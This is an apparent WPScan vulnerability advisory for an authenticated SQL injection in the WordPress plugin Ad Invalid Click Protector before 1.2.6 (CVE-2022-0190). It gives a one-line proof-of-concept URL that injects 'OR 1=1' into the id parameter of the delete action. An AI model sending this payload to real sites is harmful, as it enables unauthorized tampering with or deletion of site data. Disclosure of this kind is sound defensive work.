WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Ad Invalid Click Protector (AICP) < 1.2.6 - Authenticated SQL Injection

Description

The plugin is affected by a SQL Injection in the id parameter of the delete action.

Proof of Concept

http://127.0.0.1:8001/wp-admin/admin.php?page=aicp_banned_user_details&action=delete&id=0)%20OR%201=1%20--%20k

Affects Plugins

ad-invalid-click-protector
Fixed in version 1.2.6

References

CVE
CVE-2022-0190

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
ae322f11-d8b4-4b69-9efa-0fb87475fa44

Timeline

Publicly Published

2022-01-14 (about 8 months ago)

Added

2022-01-14 (about 8 months ago)

Last Updated

2022-04-12 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin